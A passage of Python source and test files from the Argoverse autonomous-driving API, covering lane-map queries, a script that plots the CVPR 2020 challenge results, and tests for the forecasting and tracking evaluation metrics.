add_lane_segment_to_ax(
ax, lane_centerline, halluc_lane_polygon, patch_color, xmin, xmax, ymin, ymax
)
ax.axis("equal")
plt.show()
datetime_str = generate_datetime_string()
plt.savefig(f"{trial_idx}_{datetime_str}.jpg")
plt.close("all")
def verify_point_in_polygon_for_lanes():
"""
"""
avm = ArgoverseMap()
# ref_query_x = 422.
# ref_query_y = 1005.
ref_query_x = -662
ref_query_y = 2817
city_name = "MIA"
for trial_idx in range(10):
query_x = ref_query_x + (np.random.rand() - 0.5) * 10
query_y = ref_query_y + (np.random.rand() - 0.5) * 10
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
ax.scatter([query_x], [query_y], 100, color="k", marker=".")
occupied_lane_ids = avm.get_lane_segments_containing_xy(query_x, query_y, city_name)
for occupied_lane_id in occupied_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(occupied_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color="y", alpha=0.3)
nearby_lane_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name)
nearby_lane_ids = set(nearby_lane_ids) - set(occupied_lane_ids)
for nearby_lane_id in nearby_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(nearby_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color="r", alpha=0.3)
ax.axis("equal")
plt.show()
plt.close("all")
def plot_nearby_halluc_lanes(ax, city_name, avm, query_x, query_y, patch_color="r", radius=20):
    """Plot all hallucinated lane polygons within `radius` meters of the query point, annotated with their lane IDs."""
nearby_lane_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name, radius)
for nearby_lane_id in nearby_lane_ids:
halluc_lane_polygon = avm.get_lane_segment_polygon(nearby_lane_id, city_name)
plot_lane_segment_patch(halluc_lane_polygon, ax, color=patch_color, alpha=0.3)
plt.text(halluc_lane_polygon[:, 0].mean(), halluc_lane_polygon[:, 1].mean(), str(nearby_lane_id))
def verify_lane_tangent_vector():
"""
    Debug low-confidence lane tangent predictions: the confidence score of the lane
    direction is nearly zero in some logs.
"""
POSE_FILE_DIR = "../debug_lane_tangent"
# both of these are Pittsburgh logs
log_ids = ["033669d3-3d6b-3d3d-bd93-7985d86653ea", "028d5cb1-f74d-366c-85ad-84fde69b0fd3"]
    avm = ArgoverseMap()
city_name = "PIT"
for log_id in log_ids:
print(f"On {log_id}")
pose_fpaths = glob.glob(f"{POSE_FILE_DIR}/{log_id}/poses/city_SE3_egovehicle_*.json")
num_poses = len(pose_fpaths)
egovehicle_xy_arr = np.zeros((num_poses, 2))
for i, pose_fpath in enumerate(pose_fpaths):
json_data = read_json_file(pose_fpath)
egovehicle_xy_arr[i, 0] = json_data["translation"][0]
egovehicle_xy_arr[i, 1] = json_data["translation"][1]
for i, query_xy_city_coords in enumerate(egovehicle_xy_arr[::10, :]):
query_xy_city_coords = np.array([3116.8282170094944, 1817.1269613456188])
query_xy_city_coords = np.array([3304.7072308190845, 1993.1670162837597])
# start = time.time()
lane_dir_vector, confidence = avm.get_lane_direction(query_xy_city_coords, city_name, visualize=False)
# end = time.time()
# duration = end - start
# print(f'query took {duration} s')
# if confidence < 0.5:
print(f"\t{i}: {confidence}")
# if confidence == 0.:
# pdb.set_trace()
# This was an absolute failure case!
# lane_dir_vector, confidence = avm.get_lane_direction(query_xy_city_coords, city_name, visualize=True)
visualize = True
if visualize:
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
dx = lane_dir_vector[0] * 20
dy = lane_dir_vector[1] * 20
plt.arrow(query_xy_city_coords[0], query_xy_city_coords[1], dx, dy, color="r", width=0.3, zorder=2)
query_x, query_y = query_xy_city_coords
ax.scatter([query_x], [query_y], 100, color="k", marker=".")
# make another plot now!
                plot_nearby_halluc_lanes(ax, city_name, avm, query_x, query_y)
ax.axis("equal")
plt.show()
plt.close("all")
def test_remove_extended_predecessors():
"""Test remove_extended_predecessors() for map_api"""
lane_seqs = [[9621385, 9619110, 9619209, 9631133], [9621385, 9619110, 9619209], [9619209, 9631133]]
    xy = np.array([[-130.0, 2315.0], [-129.0, 2315.0], [-128.0, 2315.0]])  # 9619209 contains xy[0]
city_name = "MIA"
avm = ArgoverseMap()
filtered_lane_seq = avm.remove_extended_predecessors(lane_seqs, xy, city_name)
assert np.array_equal(
filtered_lane_seq, [[9619209, 9631133], [9619209], [9619209, 9631133]]
), "remove_extended_predecessors() failed!"
def test_get_candidate_centerlines_for_traj():
"""Test get_candidate_centerlines_for_traj()
-180 . . . . . -100
2340
v
| .
| .
* (CL1) .
\
\
(CL2) \
>---------*-------------------->
s x x x x x x x x x e .
>--------------------------------------------> .
(CL3) 2310
"""
xy = np.array(
[[-130.0, 2315.0], [-129.0, 2315.0], [-128.0, 2315.0], [-127, 2315], [-126, 2315], [-125, 2315], [-124, 2315]]
)
city_name = "MIA"
avm = ArgoverseMap()
# import pdb; pdb.set_trace()
candidate_centerlines = avm.get_candidate_centerlines_for_traj(xy, city_name)
assert len(candidate_centerlines) == 3, "Number of candidates wrong!"
expected_centerlines = [
np.array(
[
[-131.88540689, 2341.87225878],
[-131.83054027, 2340.33723194],
[-131.77567365, 2338.8022051],
[-131.72080703, 2337.26717826],
[-131.66594041, 2335.73215142],
[-131.61107379, 2334.19712458],
[-131.55620718, 2332.66209774],
[-131.50134056, 2331.1270709],
[-131.44647394, 2329.59204406],
[-131.39160732, 2328.05701721],
[-131.39160732, 2328.05701721],
[-131.37997138, 2327.72338427],
[-131.36833545, 2327.38975132],
[-131.35669951, 2327.05611837],
[-131.34506358, 2326.72248542],
[-131.33342764, 2326.38885247],
[-131.32179171, 2326.05521952],
[-131.31015577, 2325.72158657],
[-131.29851984, 2325.38795362],
[-131.2868839, 2325.05432067],
[-131.2868839, 2325.05432067],
[-131.19279519, 2322.55119928],
[-130.98376304, 2320.05690639],
[-130.24692629, 2317.70490846],
[-128.37426431, 2316.09358878],
[-125.9878693, 2315.38876171],
[-123.48883479, 2315.29784077],
[-120.98715427, 2315.43423973],
[-118.48467829, 2315.55478278],
[-115.9822023, 2315.67532583],
[-115.9822023, 2315.67532583],
[-114.27604136, 2315.74436169],
[-112.56988042, 2315.81339756],
[-110.86371948, 2315.88243342],
[-109.15755854, 2315.95146928],
[-107.4513976, 2316.02050515],
[-105.74523665, 2316.08954101],
[-104.03907571, 2316.15857687],
[-102.33291477, 2316.22761274],
[-100.62675383, 2316.2966486],
]
),
np.array(
[
[-139.13361714, 2314.54725812],
[-136.56123771, 2314.67259898],
[-133.98885829, 2314.79793983],
[-131.41647886, 2314.92328069],
[-128.84409943, 2315.04862155],
[-126.27172001, 2315.1739624],
[-123.69934058, 2315.29930326],
[-121.12696116, 2315.42464412],
[-118.55458173, 2315.54998497],
[-115.9822023, 2315.67532583],
[-115.9822023, 2315.67532583],
[-114.27604136, 2315.74436169],
[-112.56988042, 2315.81339756],
[-110.86371948, 2315.88243342],
[-109.15755854, 2315.95146928],
[-107.4513976, 2316.02050515],
[-105.74523665, 2316.08954101],
[-104.03907571, 2316.15857687],
[-102.33291477, 2316.22761274],
[-100.62675383, 2316.2966486],
]
),
np.array(
[
[-178.94773558, 2309.75038731],
[-175.73132051, 2309.8800903],
[-172.51490545, 2310.00979328],
[-169.29849039, 2310.13949626],
[-166.08207532, 2310.26919925],
[-162.86566026, 2310.39890223],
[-159.64924519, 2310.52860522],
[-156.43283013, 2310.6583082],
[-153.21641506, 2310.78801118],
[-150.0, 2310.91771417],
[-150.0, 2310.91771417],
[-148.77816698, 2310.97013154],
[-147.55633396, 2311.0225489],
[-146.33450094, 2311.07496627],
[-145.11266792, 2311.12738364],
[-143.89083489, 2311.17980101],
[-142.66900187, 2311.23221837],
[-141.44716885, 2311.28463574],
[-140.22533583, 2311.33705311],
[-139.00350281, 2311.38947048],
[-139.00350281, 2311.38947048],
[-136.42679274, 2311.51113082],
[-133.85008268, 2311.63279117],
[-131.27337261, 2311.75445152],
[-128.69666254, 2311.87611187],
[-126.11995247, 2311.99777222],
[-123.54324241, 2312.11943257],
[-120.96653234, 2312.24109292],
[-118.38982227, 2312.36275327],
[-115.8131122, 2312.48441361],
[-115.8131122, 2312.48441361],
[-114.11040334, 2312.54102742],
[-112.40815545, 2312.6106056],
[-110.70605773, 2312.68440659],
[-109.00396, 2312.75820759],
[-107.30186227, 2312.83200858],
[-105.59976454, 2312.90580958],
[-103.89766681, 2312.97961057],
[-102.19556909, 2313.05341156],
[-100.49347136, 2313.12721256],
]
),
]
for i in range(len(expected_centerlines)):
assert np.allclose(expected_centerlines[i], candidate_centerlines[i]), "Centerline coordinates wrong!"
def test_dfs():
"""Test dfs for lane graph
Lane Graph:
9629626
/ \
/ \
9620336 9632589
(10.77) (8.33)
| |
| |
9628835 9621228
(31.9) (31.96)
| |
| |
9629406 9626257
(7.9) (7.81)
"""
lane_id = 9629626
city_name = "MIA"
dist = 0.0
threshold = 30.0
extend_along_predecessor = False
avm = ArgoverseMap()
lane_seq = avm.dfs(lane_id, city_name, dist, threshold, extend_along_predecessor)
expected_lane_seq = [[9629626, 9620336, 9628835], [9629626, 9632589, 9621228]]
assert np.array_equal(lane_seq, expected_lane_seq), "dfs over lane graph failed!"
```
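`test_dfs` above encodes a small successor graph with per-lane centerline lengths. A standalone sketch of the traversal rule its expected output implies (accumulate child centerline lengths and stop one lane after the distance threshold is crossed); this mirrors the docstring diagram and is an illustration only, not the real `ArgoverseMap.dfs`:

```python
# Successor graph and (per the diagram) centerline lengths from the test_dfs docstring.
successors = {
    9629626: [9620336, 9632589],
    9620336: [9628835],
    9632589: [9621228],
    9628835: [9629406],
    9621228: [9626257],
}
lengths = {9620336: 10.77, 9632589: 8.33, 9628835: 31.9, 9621228: 31.96, 9629406: 7.9, 9626257: 7.81}

def dfs_sketch(lane_id, dist=0.0, threshold=30.0):
    """Extend along successors until the accumulated centerline length exceeds the threshold."""
    if dist > threshold:
        return [[lane_id]]
    sequences = []
    for child in successors.get(lane_id, []):
        for seq in dfs_sketch(child, dist + lengths[child], threshold):
            sequences.append([lane_id] + seq)
    return sequences or [[lane_id]]

assert dfs_sketch(9629626) == [[9629626, 9620336, 9628835], [9629626, 9632589, 9621228]]
```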
#### File: argoverse-api/tests/make_cvpr20_argoverse_tracking_plots.py
```python
import collections
from collections import defaultdict
import copy
import csv
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pdb
import seaborn as sns
import scipy
from typing import Any, List, Mapping
from mseg.utils.csv_utils import read_csv
def make_forecasting_plots():
""" """
    sns.set_style({'font.family': 'monospace'})  # alternative: 'Times New Roman'
plt.style.use('ggplot')
result_dict = get_forecasting_results()
    # Default metric pair to plot; swap in one of the commented alternatives below.
    labels = [
        'minADE (K=1)',
        'minADE (K=6)'
    ]
# labels = [
# 'DAC (K=1)',
# 'DAC (K=6)'
# ]
# labels = [
# 'MR (K=1)',
# 'MR (K=6)'
# ]
# labels = [
# 'minFDE (K=1)',
# 'minFDE (K=6)'
# ]
# labels = [
# 'p-minADE (K=6)',
# 'p-minFDE (K=6)'
# ]
make_plot(result_dict, labels)
def make_tracking_plots():
""" """
    sns.set_style({'font.family': 'monospace'})  # alternative: 'Times New Roman'
plt.style.use('ggplot')
result_dict = get_tracking_results()
# labels = ['C:MOTA', 'P:MOTA', 'C:IDF1', 'P:IDF1']
labels = ['C:MT', 'P:MT', 'C:ML', 'P:ML']
# # FPs and FNs decreased
# labels = ['C:FP','P:FP','C:FN','P:FN']
# # Effect of Speed
# labels = [
# 'C:MT',
# 'C:MT-FST',
# ]
# # Effect of Distance
# labels = [
# 'C:MT',
# 'C:MT-FAR',
# ]
# Effect of Occlusion
# labels = [
# 'C:MT',
# 'C:MT-OCC',
# 'P:MT',
# 'P:MT-OCC',
# ]
# labels = [
# 'C:FRG',
# 'P:FRG',
# ]
# labels = [
# 'C:FRG-FAR',
# 'P:FRG-FAR',
# 'C:SW-FAR',
# 'P:SW-FAR',
# 'C:FRG-OCC',
# 'P:FRG-OCC',
# 'C:SW-OCC',
# 'P:SW-OCC',
# 'C:FRG-FST',
# 'C:SW-FST',
# ]
# Effect on MOTP
# labels = [
# 'C:MOTPD',
# 'P:MOTPD',
# 'C:MOTPI',
# 'P:MOTPI',
# ]
# labels = [
# 'C:MOTPO',
# 'P:MOTPO',
# ]
make_plot(result_dict, labels)
def get_tracking_results():
""" """
fpath = '/Users/johnlamb/Downloads/cvpr-argoverse-tracking-winners.csv'
rows = read_csv(fpath, delimiter=',')
result_dict = defaultdict(list)
for i,row in enumerate(rows):
print(row['Team name'])
# 'Submission ID,Submitted at,AVG-RANK,
result_dict['Team name'] += [row['Team name']]
result_dict['C:MOTA'] += [float(row['C:MOTA'])]
result_dict['P:MOTA'] += [float(row['P:MOTA'])]
result_dict['C:MOTPD'] += [float(row['C:MOTPD'])]
result_dict['P:MOTPD'] += [float(row['P:MOTPD'])]
result_dict['C:MOTPO'] += [float(row['C:MOTPO'])]
result_dict['P:MOTPO'] += [float(row['P:MOTPO'])]
result_dict['C:MOTPI'] += [float(row['C:MOTPI'])]
result_dict['P:MOTPI'] += [float(row['P:MOTPI'])]
result_dict['C:IDF1'] += [100 * float(row['C:IDF1'])]
result_dict['P:IDF1'] += [100 * float(row['P:IDF1'])]
result_dict['C:MT'] += [100 * float(row['C:MT'])]
result_dict['P:MT'] += [100 * float(row['P:MT'])]
result_dict['C:ML'] += [100 * float(row['C:ML'])]
result_dict['P:ML'] += [100 * float(row['P:ML'])]
result_dict['C:FP'] += [int(row['C:FP'])]
result_dict['P:FP'] += [int(row['P:FP'])]
result_dict['C:FN'] += [int(row['C:FN'])]
result_dict['P:FN'] += [int(row['P:FN'])]
result_dict['C:SW'] += [int(row['C:SW'])]
result_dict['P:SW'] += [int(row['P:SW'])]
result_dict['C:FRG'] += [int(row['C:FRG'])]
result_dict['P:FRG'] += [int(row['P:FRG'])]
result_dict['C:MT-OCC'] += [100 * float(row['C:MT-OCC'])]
result_dict['C:MT-FAR'] += [100 * float(row['C:MT-FAR'])]
result_dict['C:ML-OCC'] += [100 * float(row['C:ML-OCC'])]
result_dict['C:ML-FAR'] += [100 * float(row['C:ML-FAR'])]
result_dict['C:FRG-OCC'] += [int(row['C:FRG-OCC'])]
result_dict['C:FRG-FAR'] += [int(row['C:FRG-FAR'])]
result_dict['C:SW-OCC'] += [int(row['C:SW-OCC'])]
result_dict['C:SW-FAR'] += [int(row['C:SW-FAR'])]
result_dict['C:MT-FST'] += [100 * float(row['C:MT-FST'])]
result_dict['C:ML-FST'] += [100 * float(row['C:ML-FST'])]
result_dict['C:FRG-FST'] += [int(row['C:FRG-FST'])]
result_dict['C:SW-FST'] += [int(row['C:SW-FST'])]
result_dict['P:MT-OCC'] += [100 * float(row['P:MT-OCC'])]
result_dict['P:MT-FAR'] += [100 * float(row['P:MT-FAR'])]
result_dict['P:ML-OCC'] += [100 * float(row['P:ML-OCC'])]
result_dict['P:ML-FAR'] += [100 * float(row['P:ML-FAR'])]
result_dict['P:FRG-OCC'] += [int(row['P:FRG-OCC'])]
result_dict['P:FRG-FAR'] += [int(row['P:FRG-FAR'])]
result_dict['P:SW-OCC'] += [int(row['P:SW-OCC'])]
result_dict['P:SW-FAR'] += [int(row['P:SW-FAR'])]
return result_dict
def get_forecasting_results():
""" """
fpath = '/Users/johnlamb/Downloads/cvpr-argoverse-forecasting-winners.csv'
rows = read_csv(fpath, delimiter=',')
result_dict = defaultdict(list)
for i,row in enumerate(rows):
print(row['Team name'])
result_dict['Team name'] += [row['Team name']]
result_dict['minADE (K=1)'] += [float(row['minADE (K=1)'])]
result_dict['minFDE (K=1)'] += [float(row['minFDE (K=1)'])]
result_dict['DAC (K=1)'] += [float(row['DAC (K=1)'])]
result_dict['MR (K=1)'] += [float(row['MR (K=1)'])]
result_dict['minADE (K=6)'] += [float(row['minADE (K=6)'])]
result_dict['minFDE (K=6)'] += [float(row['minFDE (K=6)'])]
result_dict['DAC (K=6)'] += [float(row['DAC (K=6)'])]
result_dict['MR (K=6)'] += [float(row['MR (K=6)'])]
result_dict['p-minADE (K=6)'] += [float(row['p-minADE (K=6)'])]
result_dict['p-minFDE (K=6)'] += [float(row['p-minFDE (K=6)'])]
return result_dict
def make_plot(result_dict, labels):
""" """
x = np.arange(len(result_dict['Team name'])) # the label locations
if len(labels) == 2:
centers = [-0.2,0.2]
width=0.4
else:
centers = np.linspace(-0.3, 0.3, len(labels) )
width = centers[1] - centers[0]
fig, ax = plt.subplots()
all_rects = []
colors = [ "#ECA154", "#007672", "#245464", "#78909c"] # "#595959"]# "#212121"] # "#d3e8ef" ]
for label, offset,color in zip(labels, centers, colors):
rects = ax.bar(x=x + offset, height=result_dict[label], width=width, label=label, color=color)
all_rects += [rects]
# colors = [ "#ECA154", "#007672", "#245464", "#d3e8ef" ]
# for rect,color in zip(rects, colors):
# rect.set_color(color)
# Add some text for labels, title and custom x-axis tick labels, etc.
# ax.set_ylabel('Error (degrees)')
#ax.set_title('Scores by group and gender')
ax.set_xticks(x)
# # rotate the labels with proper anchoring.
ha = 'right'
ax.set_xticklabels(result_dict['Team name'], rotation=45, ha=ha)
ax.legend(
loc='upper center',
# bbox_to_anchor=(1, 0.5)
bbox_to_anchor=(0.5, 1.3),
# bbox_to_anchor=(0.5, 1.0),
# shadow=True,
ncol=4,
)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate(f'{height:.2f}',
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
for rects in all_rects:
autolabel(rects)
fig.tight_layout()
plt.show()
if __name__ == '__main__':
""" """
#make_tracking_plots()
make_forecasting_plots()
```
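`make_plot` above positions one bar per metric inside each team's group by offsetting from the group center. A tiny sketch of that layout arithmetic for four metric labels (values illustrative):

```python
import numpy as np

num_teams = 3
labels = ['C:MT', 'P:MT', 'C:ML', 'P:ML']

x = np.arange(num_teams)                       # one group center per team
centers = np.linspace(-0.3, 0.3, len(labels))  # per-metric offsets within a group: [-0.3, -0.1, 0.1, 0.3]
width = centers[1] - centers[0]                # bar width equals the spacing between offsets (0.2)

for label, offset in zip(labels, centers):
    print(label, np.round(x + offset, 2).tolist())
```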
#### File: argoverse-api/tests/test_eval_forecasting.py
```python
import numpy as np
from argoverse.evaluation.eval_forecasting import compute_metric
from numpy.testing import assert_almost_equal
def test_compute_metric():
"""Test computation of ADE and FDE"""
# Test Case:
# x: Ground Truth Trajectory
# *: Predicted Trajectory 1
# o: Predicted Trajectory 2
# 0 1 2 3 4 5 6 7 8 9 10 11 12
# 10
# 9
# * * * * * * * * * * * *
# 8 x x x x x
# 7 o o o o o x o
# 6 x o
# 5 x o
# 4 x o
# 3 x o
# 2 x o
# 1 x o
# 0
target_1 = np.array(
[
[1.0, 8.0],
[2.0, 8.0],
[3.0, 8.0],
[4.0, 8.0],
[5.0, 8.0],
[6.0, 7.0],
[7.0, 6.0],
[8.0, 5.0],
[8.0, 4.0],
[8.0, 3.0],
[8.0, 2.0],
[8.0, 1.0],
]
)
predicted_1_1 = np.array(
[
[1.0, 8.5],
[2.0, 8.5],
[3.0, 8.5],
[4.0, 8.5],
[5.0, 8.5],
[6.0, 8.5],
[7.0, 8.5],
[8.0, 8.5],
[9.0, 8.5],
[10.0, 8.5],
[11.0, 8.5],
[12.0, 8.5],
]
)
predicted_1_2 = np.array(
[
[1.0, 7.0],
[2.0, 7.0],
[3.0, 7.0],
[4.0, 7.0],
[5.0, 7.0],
[7.0, 7.0],
[8.0, 6.0],
[9.0, 5.0],
[9.0, 4.0],
[9.0, 3.0],
[9.0, 2.0],
[9.0, 1.0],
]
)
output_1 = [predicted_1_1, predicted_1_2]
target_2 = target_1
predicted_2_1 = predicted_1_1
output_2 = [predicted_2_1]
output = np.array([output_1, output_2])
target = np.array([target_1, target_2])
ade, fde, min_idx = compute_metric(output, target)
expected_ade = 2.006
expected_fde = 4.75
expected_min_idx = [1, 0]
assert_almost_equal(ade, expected_ade, 3)
assert_almost_equal(fde, expected_fde, 3)
    assert np.array_equal(min_idx, expected_min_idx)
```
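To see where the asserted values 2.006 and 4.75 come from, here is a NumPy re-derivation for this specific test case, assuming ADE is the mean per-timestep L2 error, FDE is the endpoint error, and the minimum is taken over the K candidate trajectories (variable names reuse the arrays defined inside `test_compute_metric`):

```python
import numpy as np

def ade_fde(pred, gt):
    """Average and final displacement error (L2) for one candidate trajectory."""
    dists = np.linalg.norm(pred - gt, axis=1)
    return dists.mean(), dists[-1]

# Copy target_1, predicted_1_1, predicted_1_2, target_2, predicted_2_1 from the test above to run this standalone.
errors_seq1 = [ade_fde(p, target_1) for p in (predicted_1_1, predicted_1_2)]
errors_seq2 = [ade_fde(predicted_2_1, target_2)]

min_ade = np.mean([min(a for a, _ in errs) for errs in (errors_seq1, errors_seq2)])
min_fde = np.mean([min(f for _, f in errs) for errs in (errors_seq1, errors_seq2)])
print(min_ade, min_fde)  # ~2.005 and 4.75, matching the expected values up to rounding
```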
#### File: argoverse-api/tests/test_eval_tracking.py
```python
from collections import namedtuple, defaultdict
import numpy as np
import os
from pathlib import Path
import pdb
from scipy.spatial.transform import Rotation
import shutil
from typing import Tuple
from argoverse.utils.json_utils import save_json_dict
from argoverse.evaluation.eval_tracking import eval_tracks
_ROOT = Path(__file__).resolve().parent
def check_mkdir(dirpath):
""" """
if not Path(dirpath).exists():
os.makedirs(dirpath, exist_ok=True)
def yaw_to_quaternion3d(yaw: float) -> Tuple[float,float,float,float]:
"""
Args:
- yaw: rotation about the z-axis
Returns:
- qx,qy,qz,qw: quaternion coefficients
"""
qx,qy,qz,qw = Rotation.from_euler('z', yaw).as_quat()
return qx,qy,qz,qw
fields = ('l', 'w', 'h', 'qx', 'qy', 'qz', 'qw', 'cx', 'cy', 'cz', 'track_id', 'label_class')
TrackedObjRec = namedtuple('TrackedObjRec', fields, defaults=(None,) * len(fields))
class TrackedObjects:
def __init__(self, log_id: str, is_gt: bool):
""" """
self.ts_to_trackedlabels_dict = defaultdict(list)
self.log_id = log_id
tracks_type = 'gt' if is_gt else 'pred'
self.log_dir = f'{_ROOT}/test_data/'
self.log_dir += f'eval_tracking_dummy_logs_{tracks_type}/{self.log_id}'
def add_obj(self, o: TrackedObjRec, ts_ns: int):
"""
Args:
- ts_ns: timestamp in nanoseconds
"""
self.ts_to_trackedlabels_dict[ts_ns] += [
{
"center": {"x": o.cx, "y": o.cy, "z": o.cz},
"rotation": {"x": o.qx , "y": o.qy, "z": o.qz , "w": o.qw},
"length": o.l,
"width": o.w,
"height": o.h,
"track_label_uuid": o.track_id,
"timestamp": ts_ns, # 1522688014970187
"label_class": o.label_class,
}]
def save_to_disk(self):
"""
Labels and predictions should be saved in JSON e.g.
`tracked_object_labels_315969629019741000.json`
"""
for ts_ns, ts_trackedlabels in self.ts_to_trackedlabels_dict.items():
json_fpath = f'{self.log_dir}/per_sweep_annotations_amodal/'
check_mkdir(json_fpath)
json_fpath += f'tracked_object_labels_{ts_ns}.json'
save_json_dict(json_fpath, ts_trackedlabels)
def dump_scenario_json(centers, yaw_angles, log_id, is_gt, run_eval=True):
"""
Egovehicle stationary (represented by `o`).
    Sequence of 4 timestamps (in nanoseconds).
"""
t_objs = TrackedObjects(log_id=log_id, is_gt=is_gt)
l = 2
w = 2
h = 1
track_id = 'obj_a'
label_class = 'VEHICLE'
cx, cy, cz = centers[0]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[0])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=0)
cx, cy, cz = centers[1]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[1])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=1)
cx, cy, cz = centers[2]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[2])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=2)
cx, cy, cz = centers[3]
qx,qy,qz,qw = yaw_to_quaternion3d(yaw=yaw_angles[3])
tor = TrackedObjRec(l,w,h,qx,qy,qz,qw,cx,cy,cz,track_id,label_class)
t_objs.add_obj(tor, ts_ns=3)
t_objs.save_to_disk()
if not run_eval:
return None
pred_log_dir = f'{_ROOT}/test_data/eval_tracking_dummy_logs_pred'
gt_log_dir = f'{_ROOT}/test_data/eval_tracking_dummy_logs_gt'
out_fpath = f'{_ROOT}/test_data/{log_id}.txt'
out_file = open(out_fpath, 'w')
eval_tracks(
path_tracker_output_root=pred_log_dir,
path_dataset_root=gt_log_dir,
d_min=0,
d_max=100,
out_file=out_file,
centroid_method="average",
diffatt=None,
category='VEHICLE'
)
out_file.close()
with open(out_fpath, 'r') as f:
result_lines = f.readlines()
result_vals = result_lines[0].strip().split(' ')
fn, num_frames, mota, motp_c, motp_o, motp_i, idf1 = result_vals[:7]
most_track, most_lost, num_fp, num_miss, num_sw, num_frag = result_vals[7:]
# Todo: change `num_flag` to `num_frag`
result_dict = {
'filename': fn,
'num_frames': int(num_frames),
'mota': float(mota),
'motp_c': float(motp_c),
'motp_o': float(motp_o),
'motp_i': float(motp_i),
'idf1': float(idf1),
'most_track': float(most_track),
'most_lost': float(most_lost),
'num_fp': int(num_fp),
'num_miss': int(num_miss),
'num_sw': int(num_sw),
'num_frag': int(num_frag),
}
shutil.rmtree(pred_log_dir)
shutil.rmtree(gt_log_dir)
return result_dict
def get_1obj_gt_scenario():
"""
Egovehicle stationary (represented by `o`).
    Sequence of 4 timestamps (in nanoseconds).
|-|
| |
|-|
|-|
| |
|-|
o (x,y,z) = (0,0,0)
|-|
| |
|-|
|-|
| | (x,y,z)=(-3,2,0)
|-|
"""
centers = []
# timestamp 0
cx = -3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 2
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 3
cy = 2
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
return centers, yaw_angles
def test_1obj_perfect():
""" """
log_id = '1obj_perfect'
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
centers = gt_centers
yaw_angles = gt_yaw_angles
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False, )
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert result_dict['motp_c'] == 0.0
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
def test_1obj_offset_translation():
""" """
log_id = '1obj_offset_translation'
centers = []
# timestamp 0
cx = -4
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 0
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
assert result_dict['mota'] == 100.0
assert np.allclose( result_dict['motp_c'], np.sqrt(2), atol=0.01) # (1,1) away each time
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
assert result_dict['idf1'] == 1.0
assert result_dict['most_track'] == 1.0
assert result_dict['most_lost'] == 0.0
assert result_dict['num_fp'] == 0
assert result_dict['num_miss'] == 0
assert result_dict['num_sw'] == 0
assert result_dict['num_frag'] == 0
def test_1obj_poor_translation():
"""
Miss in 1st frame, TP in 2nd frame,
lost in 3rd frame, retrack as TP in 4th frame
Yields 1 fragmentation. Prec=0.5, recall=0.5, F1=0.5
mostly tracked if it is successfully tracked
for at least 80% of its life span
If a track is only recovered for less than 20% of its
total length, it is said to be mostly lost (ML)
"""
log_id = '1obj_poor_translation'
centers = []
# timestamp 0
cx = -5
cy = 4
cz = 0
centers += [(cx,cy,cz)]
# timestamp 1
cx = -2
cy = 3
cz = 0
centers += [(cx,cy,cz)]
# timestamp 2
cx = 1
cy = 4
cz = 0
centers += [(cx,cy,cz)]
# timestamp 3
cx = 4
cy = 3
cz = 0
centers += [(cx,cy,cz)]
yaw_angles = [0,0,0,0]
# dump the ground truth first
gt_centers, gt_yaw_angles = get_1obj_gt_scenario()
# dump the ground truth first
_ = dump_scenario_json(gt_centers, gt_yaw_angles, log_id, is_gt=True, run_eval=False)
result_dict = dump_scenario_json(centers, yaw_angles, log_id, is_gt=False)
assert result_dict['num_frames'] == 4
sw = 0
mota = 1 - ((2 + 2 + 0) / 4) # 1 - (FN+FP+SW)/#GT
assert mota == 0.0
assert result_dict['mota'] == 0.0
assert np.allclose( result_dict['motp_c'], np.sqrt(2), atol=0.01) # (1,1) away each time
assert result_dict['motp_o'] == 0.0
assert result_dict['motp_i'] == 0.0
prec = 0.5
recall = 0.5
f1 = 2 * prec * recall / (prec + recall)
